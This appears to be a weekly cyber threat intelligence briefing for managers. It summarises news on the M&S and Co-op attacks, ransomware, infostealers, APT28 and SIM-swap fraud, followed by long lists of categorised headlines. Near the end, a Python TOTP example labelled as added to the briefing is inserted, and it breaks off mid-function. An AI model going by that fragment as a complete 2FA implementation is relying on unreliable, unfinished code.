Our review of threat intelligence highlights that despite long-standing guidance, many organisations still fail to act on basic protections. Regulators and insurers alike are now focusing more heavily on board-level accountability and cultural readiness, rather than purely technical defences. From conducting cyber attack drills to strengthening oversight structures, effective governance must be proactive, not reactive. HSBC’s admission that cyber security is now its single largest operational cost underscores just how strategic this issue has become.
Finally, the rise of infostealer malware, generative AI risks, and nation-state espionage campaigns such as APT28 are expanding the threat landscape. Black Arrow urges executives to conduct an impartial cyber risk assessment of their organisation, including their supply chain, and to ensure that this analysis and the resulting cyber security strategy are governed as part of the business-wide risk management.
Top Cyber Stories of the Last Week
M&S IT Contractor ‘Investigating Whether It Was Gateway for Cyber Attack’; M&S Chief Executive Faces £1.1M Pay Hit
Tata Consultancy Services is investigating whether it was the entry point for a recent cyber attack on UK retailer Marks and Spencer (M&S), which has forced the shutdown of M&S’ online clothing business for over three weeks. The breach resulted in customer data being stolen, wiped more than £750m off M&S’s market value, and could cost up to £300m in operating profit. M&S Chief Executive Stuart Machin faces a potential £1.1m loss in deferred bonuses and share-based incentives. M&S attributed the incident to human error at a third-party supplier. The UK’s data protection authority (ICO) is now assessing accountability, with potential fines of up to £17.5m. The case highlights growing concerns over third-party risks and the broader vulnerability of IT outsourcing partnerships to increasingly organised cyber crime.
https://www.ft.com/content/c658645d-289d-49ee-bc1d-241c651516b0
https://www.ft.com/content/43531d25-4f7a-4d6e-b809-e85bb8f0033e
Ransomware Attack on Food Distributor Spells More Pain for UK Supermarkets
A ransomware attack on UK chilled food distributor Peter Green Chilled has disrupted deliveries to major UK supermarkets, with fresh produce left in limbo and small businesses facing losses of up to £100,000. While transport operations continue, order processing was halted, and communication channels remain limited. The incident underscores the growing threat to supply chain resilience, as cyber criminals increasingly target operational systems to inflict maximum disruption. Experts warn that these attacks are no longer just data breaches but full-blown operational crises, with widespread financial and societal consequences, making investment in cyber resilience critical for the retail sector and its partners.
https://www.theregister.com/2025/05/20/ransomware_attack_on_food_distributor/
Businesses Ignore Advice on Preventing Cyber Attacks, Says GCHQ
Despite years of guidance, the UK GCHQ’s National Cyber Security Centre warns that British organisations are still failing to act on freely available cyber security advice. Recent attacks on major retailers and government bodies have highlighted a growing gap between escalating risks and national readiness. Leaders are being urged to take immediate action, as regulatory pressure mounts through a proposed Cyber Resilience Bill aiming to improve supply chain security and grant stronger enforcement powers.
Executive Complacency Is the Most Dangerous Cyber Threat Today, Warns Insurance VP
Executive complacency is emerging as one of the most critical cyber security threats facing organisations today. While insurance and outsourced services can help, they do not absolve leadership of responsibility. Businesses that suffer a cyber attack may face not only operational downtime but also severe reputational damage, which can erode customer trust and long-term viability. Increasingly, insurers are expanding cover to address risks from non-technology vendors and reputational harm, but only where financial loss can be clearly demonstrated. Experts urge board-level engagement and regular risk assessments, with many tools now available to support benchmarking and proactive cyber resilience planning.
Cyber Security Now HSBC’s Largest Operational Cost
HSBC UK has confirmed that cyber security is now its largest operational expense, with hundreds of millions of pounds spent annually to defend against constant digital threats. The bank’s CEO highlighted that attacks are relentless, with over 1,000 transactions processed every second and around 8,000 IT changes made weekly. As customers increasingly rely on digital services, resilience and rapid recovery are critical. This comes as scrutiny intensifies across the financial sector, following widespread service outages and incidents linked to third-party software failures affecting major UK banks.
Best Practices for Board-Level Cyber Security Oversight
Corporate boards are under growing regulatory and operational pressure to strengthen their cyber security oversight. New US disclosure rules now require public companies to outline board-level governance, including how often cyber risks are reviewed, how incidents are reported, and how security is embedded into wider business strategy. Best practice calls for boards to maintain a dedicated oversight structure, meet with the CISO quarterly, and integrate cyber resilience into enterprise risk management. Regular briefings, external expertise, and realistic incident response protocols are essential to ensure accountability, reduce exposure, and support informed, agile decision-making in a dynamic threat landscape.
https://www.techtarget.com/searchsecurity/tip/Best-practices-for-board-level-cybersecurity-oversight
The Importance of Culture in an Effective Cyber Security Programme
A strong cyber security culture is as vital as technical controls in protecting an organisation. Success hinges on leadership fostering a security-first mindset, where all employees understand their role in safeguarding information. Open communication, regular training, and a non-punitive approach to incident reporting create an environment of shared responsibility. When security is embedded into daily operations and visibly supported by leadership, organisations are better equipped to respond to threats and reduce risk. As threats evolve, this cultural foundation enhances resilience and ensures that cyber security remains a collective and continuous priority across the business.
https://www.jdsupra.com/legalnews/the-importance-of-culture-in-an-8005006/
You Do a Fire Drill, so Do a Cyber Attack Drill
Recent cyber attacks on major British retailers have underscored that cyber security is not a luxury but a necessity for all businesses. The disruption caused has ranged from operational paralysis to reputational harm, with some customers even left without basic services. A key takeaway is that strong technology alone is not enough: cultural preparedness and leadership involvement are critical. Just as businesses conduct fire drills, cyber attack simulations should be standard practice. Organisations that fail to plan for continuity, train key personnel, and embed cyber security into contracts and culture risk serious legal, financial, and operational consequences.
https://www.scotsman.com/business/you-do-a-fire-drill-so-do-a-cyber-attack-drill-5137321
Many Rush into GenAI Deployments, Frequently Without a Security Net
Thales research shows that 70% of organisations now rank the rapid growth of generative AI (GenAI) as their top security concern, with many moving ahead before fully securing their environments. A third are already operationalising GenAI, often without a clear understanding of how it integrates with existing systems. Despite this, 73% are actively investing in AI-specific defences, including tools from cloud providers and emerging vendors. GenAI security has become the second-highest priority after cloud security. At the same time, organisations remain alert to evolving risks, including phishing and post-quantum threats, yet many are still lagging in implementing robust countermeasures.
https://www.helpnetsecurity.com/2025/05/22/genai-adoption-security-concern/
SMBs Remain Easy Pickings for Cyber Criminals – Here’s Why
Research shows that over half of UK businesses have suffered a cyber attack in the past five years, with small and medium-sized businesses (SMBs) particularly at risk due to limited budgets, overworked IT teams, and lack of staff training. These weaknesses have led to an estimated £3.4 billion in annual losses for UK SMBs alone. As cyber threats become more advanced, fuelled by artificial intelligence and accessible criminal tools like ransomware-as-a-service, organisations must invest in basic protections, clear policies, and realistic staff training. Without this, the average cost of a breach could escalate alongside reputational and operational damage.
https://www.techradar.com/pro/smbs-remain-easy-pickings-for-cybercriminals-heres-why
Your Information Was Probably Stolen Again: Researcher Discovers 184 Million Stolen Logins
A security researcher has uncovered a publicly exposed database containing over 184 million stolen login credentials from major platforms including Microsoft, Google and PayPal. The 47GB trove, believed to be collected via infostealer malware, included plaintext usernames, passwords and sensitive terms such as "bank" and "wallet", significantly raising the risk of financial fraud. Among the records were over 220 government email addresses spanning 29 countries, signalling potential national security implications. The incident highlights the ongoing threat posed by data harvested through phishing and malicious downloads, and underscores the critical importance of strong passwords, two-factor authentication and continuous monitoring.
Lumma Infostealer Infected About 10 Million Systems Before Global Disruption
LummaC2, a leading malware-as-a-service platform, infected approximately 10 million systems worldwide before a coordinated international takedown disrupted its operations. Used by cyber criminals to harvest sensitive data, including login credentials, financial information, and browser-stored details, the malware is linked to over $36 million in credit card theft in 2023 alone. Victims ranged from individuals to Fortune 500 companies across sectors such as healthcare, finance, and education. Although the group’s infrastructure has been dismantled, authorities warn that the threat may re-emerge, highlighting the ongoing need for vigilance and cross-sector collaboration to protect against sophisticated data theft operations.
https://cyberscoop.com/lumma-infostealer-widespread-victims/
Russia-Linked APT28 Targets Western Logistics Entities and Technology Firms
The US Cybersecurity and Infrastructure Security Agency (CISA) has warned that a Russian state-sponsored group, APT28, is actively targeting Western logistics and technology firms supporting aid to Ukraine, posing a growing threat to NATO-aligned supply chains. Since 2022, organisations across 13 countries have been compromised, including those in defence, rail, and maritime sectors. The attackers used a mix of phishing, brute-force attacks, and exploitation of known software flaws to access systems, steal credentials, and exfiltrate sensitive shipment and personnel data. The campaign also leveraged live IP camera feeds near Ukraine’s borders. Authorities expect this espionage-focused activity to persist.
Governance, Risk and Compliance
Businesses ignore advice on preventing cyber attacks, says GCHQ
Jump in cyber attacks should put businesses on high alert | Computer Weekly
You do a fire drill, so do a cyber attack drill
Best practices for board-level cyber security oversight | TechTarget
Cyber attack threat keeps me awake at night, bank boss says - BBC News
Cyber Security now HSBC's largest operational cost | Mortgage Introducer
The Hidden Cyber Security Risks of M&A
The Importance of Culture in an Effective Cyber Security Program | Ankura - JDSupra
Threats
Ransomware, Extortion and Destructive Attacks
What we know about DragonForce ransomware • The Register
Scattered Spider snared financial orgs before retail • The Register
Service desks are under attack: What can you do about it?
Scattered Spider's Ties to Russia: Closer Than We Think?
3am Ransomware Adopts Email Bombing, Vishing Combo Attack
Ransomware gangs increasingly use Skitnet post-exploitation malware
LockBit Leaks Reveal Drive to Recruit Ransomware Newbies
Sarcoma Ransomware Unveiled: Anatomy of a Double Extortion Gang
Ransomware Gangs Use Skitnet Malware for Stealthy Data Theft and Remote Access
Ex-NSA listened to Scattered Spider's calls: 'They're good' • The Register
Hackers are spreading fake password manager ransomware via Bing ads | PCWorld
VanHelsing ransomware builder leaked on hacking forum
Growing Number Of Targeted Businesses Paying Cyber Criminals, Survey Shows | Scoop News
New Ransomware Attack Mocking Elon Musk Supporters Using PowerShell to Deploy Payloads
Ransomware Victims
How hackers went undetected for 52 hours to cripple M&S
M&S chief executive faces £1.1mn pay hit after cyber attack
Ransomware strikes UK food distributor in latest retail blow • The Register
What we know about DragonForce ransomware • The Register
Service desks are under attack: What can you do about it?
Marks & Spencer faces $402 million profit hit after cyber attack
Why DragonForce is growing in prominence – with retailer attacks boosting its reputation | IT Pro
Investors and shoppers await clues on fallout from M&S cyber attack | Marks & Spencer | The Guardian
M&S cyber attack has cost £300m so far - and disruption will continue until July
Lawyers eyeing M&S cyber attack slammed as ‘predatory’ | The Grocer
UK businesses 'ignore free advice' to stop cyber attacks, GCHQ warns as M&S still reels... - LBC
M&S and Co-Op: BBC reporter on talking to the hackers - BBC News
'Cyber Siege' BBC documentary explores 'devastating' attack on council five years on - Teesside Live
Sensitive Personal Data Stolen in West Lothian Ransomware Attack - Infosecurity Magazine
Mobile carrier Cellcom confirms cyber attack behind extended outages
Kettering Health hit by system-wide outage after ransomware attack
Arla Foods confirms cyber attack disrupts production, causes delays
Phishing & Email Based Attacks
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
Polymorphic phishing attacks flood inboxes - Help Net Security
New Phishing Attack Mimic as Zoom Meeting Invites to Steal Login Details
Novel Phishing Attack Combines AES, Poisoned npm Packages
Russian Threat Actor TAG-110 Goes Phishing in Tajikistan
Business Email Compromise (BEC)/Email Account Compromise (EAC)
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
Other Social Engineering
Service desks are under attack: What can you do about it?
3am Ransomware Adopts Email Bombing, Vishing Combo Attack
AI voice hijacking: How well can you trust your ears? - Help Net Security
How to Win Followers and Scamfluence People | WIRED
Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine
SIM scammer who helped hijack SEC X account put behind bars • The Register
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
Fraud, Scams and Financial Crime
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
‘Free hamper – just pay P&P’: the scam offers targeting your bank details | Scams | The Guardian
How to Win Followers and Scamfluence People | WIRED
Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine
Artificial Intelligence
Many rush into GenAI deployments, frequently without a security net - Help Net Security
Uncensored AI Tool Raises Cyber Security Alarms - Infosecurity Magazine
Mapping the Future of AI Security - Security Boulevard
Data Security Risk: Analysis of AI Tools Reveals 84% Breached | Security Magazine
AI voice hijacking: How well can you trust your ears? - Help Net Security
How to Win Followers and Scamfluence People | WIRED
Security Threats of Open Source AI Exposed by DeepSeek
Be careful what you share with GenAI tools at work - Help Net Security
Finding the right balance between 'vibe coders' and security - IT Security Guru
GitLab's AI Assistant Opened Devs to Code Theft
Meta plans to train AI on EU user data from May 27 without consent
Irish DPC okays Meta's EU AI training plans • The Register
2FA/MFA
What is Universal 2nd Factor (U2F)? | Definition from TechTarget
Malware
Lumma infostealer infected about 10 million systems before global disruption | CyberScoop
Malware Evasion Techniques - What Defenders Need to Know
100+ Fake Chrome Extensions Found Hijacking Sessions, Stealing Credentials, Injecting Ads
Ransomware Gangs Use Skitnet Malware for Stealthy Data Theft and Remote Access
Novel Phishing Attack Combines AES, Poisoned npm Packages
Data-stealing Chrome extensions impersonate Fortinet, YouTube, VPNs
Fake CAPTCHA Attacks Deploy Infostealers and RATs in a Multistage Payload Chain | Trend Micro (US)
Warning! Malicious Chrome extensions found mimicking legit tools | PCWorld
Feds finger Russian 'Qakbot mastermind', 700k computers hit • The Register
What Is a Computer Virus, Really?
Bots/Botnets
Hackers unleash botnet capable of ‘killing most companies’ | The Independent
Mobile
Phone theft is on the rise - 7 ways to protect your device before it's too late | ZDNET
How to hack a phone: 7 common attack methods explained | CSO Online
O2 UK patches bug leaking mobile user location from call metadata
Say goodbye to passwords: Android’s bold security shift explained - Talk Android
Denial of Service/DoS/DDoS
Internet of Things – IoT
Growing Cyberthreats To The Internet Of Things
Why console makers can legally brick your game console - Ars Technica
Data Breaches/Leaks
Mysterious Database of 184 Million Records Exposes Vast Array of Login Credentials | WIRED
M&S faces multimillion-pound lawsuit over cyber attack data leak - Retail Gazette
M&S’ Slow Recovery From Cyber Attack Puts it at Risk of Lasting Damage
Legal Aid Agency Warns Lawyers, Defendants on Data Breach
Solicitors criticise ‘antiquated’ Legal Aid Agency IT system after cyber attack | The Independent
M&S CEO faces multimillion-pound pay hit after cyber attack - Retail Gazette
Legal Aid cyber attack 'more extensive than originally understood'
M&S cyber attack has cost £300m so far - and disruption will continue until July
Lawyers eyeing M&S cyber attack slammed as ‘predatory’ | The Grocer
Large Retailers Land in Scattered Spider's Ransomware Web
UK businesses 'ignore free advice' to stop cyber attacks, GCHQ warns as M&S still reels... - LBC
More Law Firms Join the Surge of Class Action Lawsuits Against Coinbase in Wake of Cyber Attack
Coinbase confirms insider breach affects 70,000 users • The Register
Cyber attack on Legal Aid Agency exposed ‘significant amount’ of applicant data - LBC
11 Of The Worst Data Breaches In The History Of The Internet
Report: Over 50% of top oil and gas firms hit by data breaches in last 30 days | World Pipelines
Debt Collector Data Breach Affects 200,000 Harbin Clinic Patients - Infosecurity Magazine
Lessons from the M&S cyber attack: how brands can survive digital catastrophe | Creative Boom
Coca-Cola workers' info allegedly stolen by hackers | Cybernews
GitLab's AI Assistant Opened Devs to Code Theft
Organised Crime & Criminal Actors
BERNAMA - Phishing And Online Scams Dominate Global Cyber Crime Landscape - INTERPOL
LockBit Leaks Reveal Drive to Recruit Ransomware Newbies
‘Free hamper – just pay P&P’: the scam offers targeting your bank details | Scams | The Guardian
The cyber criminals are now doing PR | PR Week UK
How to Win Followers and Scamfluence People | WIRED
European Union sanctions Stark Industries for enabling cyber attacks
Attacker Specialization Puts Threat Modeling on Defensive
SIM scammer who helped hijack SEC X account put behind bars • The Register
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
Hackers use fake Ledger apps to steal Mac users’ seed phrases
Coinbase confirms insider breach affects 70,000 users • The Register
Identity Security Has an Automation Problem—And It's Bigger Than You Think
Insider Risk and Insider Threats
Coinbase confirms insider breach affects 70,000 users • The Register
Identity Security Has an Automation Problem—And It's Bigger Than You Think
Insurance
UK Retail Cyber Attacks May Drive Up US Insurance Premiums
Supply Chain and Third Parties
UK supermarket distributor suffers ransomware attack - BBC News
Third-party vendors responsible for 41.8% of fintech data breaches, survey claims
NHS England Rolls Out Voluntary Cyber Charter for IT Suppliers
Cloud/SaaS
10 SaaS Security Risks Most Organisations Miss | Grip - Security Boulevard
Outages
Delta’s lawsuit against CrowdStrike given go-ahead • The Register
Mobile carrier Cellcom confirms cyber attack behind extended outages
Identity and Access Management
Exposed Credentials: Powering the Global Cyber Crime Wave
Modern authentication: Why OIDC and SAML are just the start - Security Boulevard
Identity Security Has an Automation Problem—And It's Bigger Than You Think
Encryption
Preparing for the post-quantum era: a CIO's guide to securing the future of encryption | CyberScoop
Governments continue losing efforts to gain backdoor access to secure communications
Passwords, Credential Stuffing & Brute Force Attacks
Mysterious Database of 184 Million Records Exposes Vast Array of Login Credentials | WIRED
Warning — Stealing Windows Passwords Is As Easy As APT 123
Exposed Credentials: Powering the Global Cyber Crime Wave
Social Media
Meta plans to train AI on EU user data from May 27 without consent
Irish DPC okays Meta's EU AI training plans • The Register
Malvertising
Half of Consumers Targeted by Social Media Fraud Ads - Infosecurity Magazine
Hackers are spreading fake password manager ransomware via Bing ads | PCWorld
Regulations, Fines and Legislation
Japan arms itself against foreign cyber attacks with new law
GDPR Changes Risk Undermining its Principles, Civil Society Warns - Infosecurity Magazine
NSA cyber director Luber to retire at month’s end | The Record from Recorded Future News
Governments continue losing efforts to gain backdoor access to secure communications
Japan passed a law allowing preemptive offensive cyber actions
FTC finalizes order requiring GoDaddy to secure hosting services
CVE Disruption Threatens Foundations of Defensive Security
Members vexed by Cyber Command turmoil - Roll Call
Models, Frameworks and Standards
GDPR Changes Risk Undermining its Principles, Civil Society Warns - Infosecurity Magazine
NCC Group Expert Warns UK Firms to Prepare for New Cyber Security Bill - Infosecurity Magazine
Collaboration is key in the Cyber Assessment Framework | UKAuthority
Inside MITRE ATT&CK v17: Smarter defences, sharper threat intel - Help Net Security
Cyber Security Now Central to Digital Health M&A Success
Data Protection
Meta plans to train AI on EU user data from May 27 without consent
Irish DPC okays Meta's EU AI training plans • The Register
Careers, Working in Cyber and Information Security
UK Cyber Vacancies Growing 12% Per Year - Infosecurity Magazine
Why so many military veterans move into cyber security - BBC News
Law Enforcement Action and Take Downs
Lumma infostealer infected about 10 million systems before global disruption | CyberScoop
Police takes down 300 servers in ransomware supply-chain crackdown
Police arrests 270 dark web vendors, buyers in global crackdown
Feds finger Russian 'Qakbot mastermind', 700k computers hit • The Register
SIM scammer who helped hijack SEC X account put behind bars • The Register
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
US Navy petty officer charged in horrific CSAM case • The Register
Teen to plead guilty to PowerSchool extortion attack • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
From 60 to 4,000: NATO's Locked Shields Reflects Cyber Defence Growth - SecurityWeek
China
Chinese hackers breach US local governments using Cityworks zero-day
Ivanti EPMM flaw exploited by Chinese hackers to breach govt agencies
Chinese ‘kill switches’ found in US solar farms
Russia
Russia-linked APT28 targets western logistics entities and technology firms
Russian APT Groups Intensify Attacks in Europe with Zero-Day Exploits - Infosecurity Magazine
Nation-state APTs ramp up attacks on Ukraine and the EU - Help Net Security
Scattered Spider's Ties to Russia: Closer Than We Think?
Unpacking Russia's cyber nesting doll - Atlantic Council
Europe sanctions Putin's pals over 'hybrid' threats • The Register
Russia to enforce location tracking app on all foreigners in Moscow
U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cyber Crime Operation
Russian Threat Actor TAG-110 Goes Phishing in Tajikistan
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Tools and Controls
You do a fire drill, so do a cyber attack drill
100+ Fake Chrome Extensions Found Hijacking Sessions, Stealing Credentials, Injecting Ads
Data-stealing Chrome extensions impersonate Fortinet, YouTube, VPNs
Finding the right balance between 'vibe coders' and security - IT Security Guru
Lessons from the M&S cyber attack: how brands can survive digital catastrophe | Creative Boom
NCSC Helps Firms Securely Dispose of IT Assets - Infosecurity Magazine
Modern authentication: Why OIDC and SAML are just the start - Security Boulevard
Threat intelligence is crucial but organisations struggle to use it
The hidden gaps in your asset inventory, and how to close them - Help Net Security
How to Develop & Communicate Metrics for CSIRPs
Warning! Malicious Chrome extensions found mimicking legit tools | PCWorld
What is Universal 2nd Factor (U2F)? | Definition from TechTarget
Identity Security Has an Automation Problem—And It's Bigger Than You Think
GitLab's AI Assistant Opened Devs to Code Theft
AI hallucinations and their risk to cyber security operations - Help Net Security
What good threat intelligence looks like in practice - Help Net Security
Other News
SMBs remain easy pickings for cyber criminals - here’s why | TechRadar
From 60 to 4,000: NATO's Locked Shields Reflects Cyber Defence Growth - SecurityWeek
Cyber security: Lack of planning and outdated IT systems putting Scotland at risk
Healthcare Cyber Attacks Intensify, Sector Now Prime Target - Infosecurity Magazine
Cyber attack threat keeps me awake at night, bank boss says - BBC News
How to safeguard your small business in the hybrid work era: 5 top cyber security solutions | ZDNET
UK 'extremely dependent' on the US for space security • The Register
Why shipping can’t wait for another cyber security crisis - Splash247
German Cyber Agency Sounds Warning on Grid Vulnerabilities
UK Science Funding HQ hit by 5.4M cyber assaults as attacks increase 600%
Vulnerability Management
Russian APT Groups Intensify Attacks in Europe with Zero-Day Exploits - Infosecurity Magazine
Nation-state APTs ramp up attacks on Ukraine and the EU - Help Net Security
CVE Disruption Threatens Foundations of Defensive Security
Vulnerability Exploitation Probability Metric Proposed by NIST, CISA Researchers - SecurityWeek
NIST's LEV Equation to Rate Chances a Bug Was Exploited
Vulnerabilities
Same suspected Chinese spies again attacking Ivanti bugs • The Register
Ivanti RCE attacks 'ongoing,' exploitation hits clouds • The Register
NATO-Flagged Vulnerability Tops Latest VMware Security Patch Batch - SecurityWeek
Critical OpenPGP.js Vulnerability Allows Spoofing - SecurityWeek
GitLab, Atlassian Patch High-Severity Vulnerabilities - SecurityWeek
Unpatched Windows Server Flaw Threatens AD Users
Cisco Patches High-Severity DoS, Privilege Escalation Vulnerabilities - SecurityWeek
Mozilla fixed zero-days demonstrated at Pwn2Own Berlin 2025
Windows 10 emergency updates fix BitLocker recovery issues
Multiple pfSense Firewall Vulnerabilities Let Attackers Inject Malicious Codes
RCE Vulnerability Found in RomethemeKit For Elementor Plugin - Infosecurity Magazine
O2 UK patches bug leaking mobile user location from call metadata
Critical Zero-Days Found in Versa Networks SD-WAN/SASE Platform - Infosecurity Magazine
Black Arrow Cyber Threat Intelligence Briefing 16 May 2025
Black Arrow Cyber Threat Intelligence Briefing 16 May 2025:
-Thousands of UK Companies 'Could Have M&S-Style Hackers Waiting in Their Systems'
-North Korean IT Workers Are Being Exposed on a Massive Scale, Potentially Thousands of Businesses Infiltrated
-‘They Yanked Their Own Plug’: How Co-op Averted an Even Worse Cyber Attack
-UK Government Publishes New Software and Cyber Security Codes of Practice
-Ransomware and the Board’s Role: What You Need to Know
-73% of CISOs Admit Security Incidents Due to Unknown or Unmanaged Assets
-AI Is Making Phishing Emails Far More Convincing with Fewer Typos and Better Formatting: Here’s How to Stay Safe
-Ransomware Enters ‘Post-Trust Ecosystem’
-Sim-Swap Fraud Rises by 1,000%: Why You Should Use App-Based, not SMS-Based, Two-Factor Authentication
-Cyber Threats Outpace Global Readiness
-CISOs Must Speak Business to Earn Executive Trust
-Downing St Updating Secret Contingencies for Russia Cyber Attack, Report Claims
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
There has been a continued rise in the sophistication and scale of social engineering threats, particularly phishing campaigns enhanced by generative AI. These attacks increasingly bypass traditional filters and exploit executive impersonation, with one malicious email now detected every 42 seconds. Simultaneously, criminal groups are embedding themselves within corporate environments for prolonged periods, enabled by ransomware-as-a-service and AI-driven deception. This underscores the need for continuous monitoring, behaviour-based threat detection, and stronger identity verification practices across organisations.
Meanwhile, the global cyber threat landscape is becoming more fragmented and unpredictable. Ransomware gangs are operating without clear allegiances, making extortion attempts more erratic and harder to trace. At the same time, state-aligned actors, including North Korean IT operatives, are covertly infiltrating Western businesses under fake identities, exploiting remote work trends to fund illicit national objectives. Despite growing investment, nearly three-quarters of CISOs admit incidents caused by unknown or unmanaged assets—highlighting the critical importance of full visibility across the digital estate.
We believe boards must move from passive oversight to active engagement. The UK’s new Cyber Governance Code of Practice reflects this shift, encouraging directors to treat cyber risk as integral to business resilience. As threats intensify, governance, testing, and strategic communication must become core pillars of cyber readiness.
Top Cyber Stories of the Last Week
Thousands of UK Companies 'Could Have M&S-Style Hackers Waiting in Their Systems'
There are warnings that a growing number of UK businesses may already be compromised, with attackers silently embedded in their systems awaiting the right moment to strike. This follows a surge in high-profile incidents including M&S, the Co-op, Dior and Harrods, linked to an evolution of criminal tactics. The emergence of ‘ransomware-as-a-service’ is enabling less skilled actors to launch sophisticated attacks using pre-built tools. Combined with generative AI-enhanced social engineering, the risk landscape is becoming more unpredictable. Many firms remain unaware of these intrusions until damage is done, highlighting the urgent need for continuous monitoring and stronger internal controls.
North Korean IT Workers Are Being Exposed on a Massive Scale, Potentially Thousands of Businesses Infiltrated
North Korean IT workers are increasingly infiltrating Western businesses by posing as legitimate remote developers, generating hundreds of millions of dollars annually to fund the regime’s weapons programmes and evade sanctions. A new report has exposed over 1,000 email addresses linked to these operations, with individuals often using fake identities, AI tools, and face-changing software to secure roles. Despite operating globally from Laos to Russia, many leave digital trails that reveal their activities. The scale and adaptability of these operations, likened to a state-run crime syndicate, underline the need for tighter scrutiny of remote hiring and identity verification processes.
‘They Yanked Their Own Plug’: How Co-op Averted an Even Worse Cyber Attack
The UK supermarket chain Co-op appears to have avoided a more severe cyber attack by rapidly disconnecting its systems after detecting malicious activity, a decision that disrupted operations but ultimately prevented ransomware deployment. In contrast, M&S suffered greater system compromise, with ongoing issues affecting online orders and store operations. The incident is costing M&S an estimated £43 million per week. The cyber crime group responsible, linked to a service known as DragonForce, claims to have accessed both retailers’ networks. Co-op’s swift response is viewed by experts as a decisive move that limited long-term damage but highlighted the continuing challenge of restoring public trust.
UK Government Publishes New Software and Cyber Security Codes of Practice
The UK government has introduced two new voluntary codes to help raise standards in cyber security and software resilience. The Cyber Governance Code of Practice, aimed at boards and directors of medium and large organisations, sets out how leadership teams should govern and monitor cyber security risks. It encourages directors to embed cyber governance into business risk management, focusing on oversight rather than operational duties. Complementing this, the Software Security Code of Practice outlines 14 principles for secure software development and maintenance, aligned with international frameworks. While voluntary, both codes may soon influence contractual requirements in supply chains.
Ransomware and the Board’s Role: What You Need to Know
Ransomware continues to escalate in scale and complexity, with attackers leveraging AI, remote work gaps, and third-party exposures to increase pressure on organisations. Boards are being urged to actively engage in cyber resilience planning, ensuring foundational controls such as multi-factor authentication, immutable backups, and incident response protocols are in place. Emphasis is also placed on testing recovery capabilities, reviewing cyber insurance terms, and rehearsing decision-making through tabletop exercises. Crucially, boards must prepare for the strategic, legal and reputational implications of whether to pay a ransom, with pre-agreed decision frameworks now seen as essential for effective crisis response.
73% of CISOs Admit Security Incidents Due to Unknown or Unmanaged Assets
Nearly three-quarters of cyber security leaders admit to experiencing security incidents due to unknown or unmanaged assets within their IT environments. Despite 90% acknowledging that attack surface management directly affects business risk, fewer than half of organisations have dedicated tools in place, and 58% lack continuous monitoring. The consequences of inaction are wide-ranging, with leaders citing risks to business continuity, customer trust, financial performance, and supplier relationships. As digital infrastructures grow more complex, firms are being urged to treat cyber risk management as a strategic priority rather than a technical afterthought.
AI Is Making Phishing Emails Far More Convincing with Fewer Typos and Better Formatting: Here’s How to Stay Safe
AI is transforming phishing into a more dangerous and convincing threat. New analysis shows that email-based scams have risen by 70% year-on-year, with one malicious message detected every 42 seconds. These attacks now feature flawless grammar, professional formatting, and realistic sender details, often impersonating senior executives. Traditional email filters are struggling, particularly against polymorphic attacks that constantly change to evade detection. Over 40% of malware in these campaigns is newly observed, including remote access tools. With generative AI accelerating this trend, organisations must shift from legacy defences to behaviour-based threat detection and strengthen verification procedures across the organisation.
Ransomware Enters ‘Post-Trust Ecosystem’
Ransomware threats have entered a new, more fragmented era, where traditional trust between cyber criminals has broken down following major law enforcement operations. High-profile takedowns in 2024 disrupted dominant ransomware groups, leading to reduced ransom payments and a shift away from large, centralised platforms. The result is a more unpredictable threat landscape, marked by agile, peer-to-peer groups and an increase in encryption-less extortion. This decentralisation, alongside the rise of ransomware ‘cartels’, signals an evolution in attacker tactics that is lowering entry barriers and complicating defensive strategies for organisations of all sizes.
SIM-Swap Fraud Rises by 1,000%: Why You Should Use App-Based, not SMS-Based, Two-Factor Authentication
SIM-swap fraud in the UK has surged by over 1,000%, with nearly 3,000 cases reported in 2024, up from just 289 the previous year. Criminals trick or bribe mobile phone providers into transferring a victim's number to a SIM they control, so that SMS one-time codes are delivered to the attacker; this bypasses SMS-based two-factor authentication and gives access to the victim's personal accounts. Older consumers and sectors like retail and telecoms are particularly vulnerable. The rise of eSIMs, which can be provisioned without a physical card, is expected to further increase risk. In one case, a victim lost £50,000 while abroad after fraudsters took control of his accounts. Organisations are urged to strengthen identity verification processes and encourage customers to use app-based authentication methods, which generate codes on the device from a shared secret rather than sending them over the mobile network, where possible.
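To show why app-based codes are not affected by a SIM swap, the following is an added example (not code from the briefing or from any authenticator vendor) of the RFC 6238 TOTP scheme that authenticator apps implement: the code is derived from a shared secret and the current time on both sides, so no message ever crosses the mobile network. The secret below is the RFC 4226/6238 reference test secret, base32-encoded as it would appear in an enrolment QR code, and is constructed for the example; the 30-second step, 6-digit codes and the replay guard are assumptions that match common deployments.

```python
import base64
import hashlib
import hmac
import struct
import time

# Constructed example secret: the RFC 4226/6238 reference key "12345678901234567890",
# base32-encoded as an authenticator app would receive it. Never reuse in production.
EXAMPLE_SECRET_B32 = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"
STEP_SECONDS = 30  # assumed time step, the value almost all authenticator apps use


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then
    dynamic truncation to a zero-padded decimal code."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return f"{binary % (10 ** digits):0{digits}d}"


def totp(secret_b32: str, at: int, digits: int = 6) -> str:
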